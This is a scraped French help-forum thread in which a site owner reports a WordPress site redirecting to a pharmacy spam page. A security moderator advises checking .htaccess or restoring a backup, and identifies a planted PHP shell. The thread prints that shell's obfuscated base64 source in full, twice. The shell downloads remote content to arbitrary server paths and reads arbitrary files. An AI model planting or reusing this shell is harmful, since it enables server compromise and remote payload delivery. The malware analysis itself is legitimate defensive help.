Hack site wordpress redirection pharma
AFC
-
Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité -
Malekal_morte- Messages postés 184347 Statut Modérateur, Contributeur sécurité -
Bonjour, j'ai besoin de votre aide. Mon site internet (http://alliance-cam.co.uk/) a sans doute été piraté : lorsque je clique sur le lien google qui est censé m'y mener, je suis redirigé vers un site qui n'a strictement rien à voir (http://canadian-meds-365.com/product/Caverta.html). Pouvez vous m'aider ?
Merci d'avance !
Merci d'avance !
A voir également:
- Hack site wordpress redirection pharma
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Site x - Guide
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site pour vendre des objets d'occasion - Guide
4 réponses
Salut,
Ca peux venir de différents éléments : https://blog.sucuri.net/?s=pharma
Lire : https://www.malekal.com/securiser-wordpress/
Faut vérifier ton fichier .htaccess ou plus probablement un script qui a été ajouté et qui génère la redirection.
Si tu n'as pas les connaissances techniques suffisantes pour nettoyer le site, le mieux c'est de repartir sur une sauvegarde saine.
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
Ca peux venir de différents éléments : https://blog.sucuri.net/?s=pharma
Lire : https://www.malekal.com/securiser-wordpress/
Faut vérifier ton fichier .htaccess ou plus probablement un script qui a été ajouté et qui génère la redirection.
Si tu n'as pas les connaissances techniques suffisantes pour nettoyer le site, le mieux c'est de repartir sur une sauvegarde saine.
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
t'as au moins un PHP Shell ....
wp-includes :
dev.php 3.77 KB 2014-08-18 12:58:11 alliance-cam.co.uk/alliance-cam.co.uk -rw-r--r-- R T E D
class-legacy.php 42.51 KB 2014-08-18 12:04:39 alliance-cam.co.uk/alliance-cam.co.uk
c'est moche - ca doit appeler une url pour générer la redirection vers la page pharma qui doit changer régulièrement - vais checker:
<?php echo("license"); $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} ?>
dev.php 3.77 KB 2014-08-18 12:58:11 alliance-cam.co.uk/alliance-cam.co.uk -rw-r--r-- R T E D
class-legacy.php 42.51 KB 2014-08-18 12:04:39 alliance-cam.co.uk/alliance-cam.co.uk
c'est moche - ca doit appeler une url pour générer la redirection vers la page pharma qui doit changer régulièrement - vais checker:
<?php echo("license"); $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} ?>
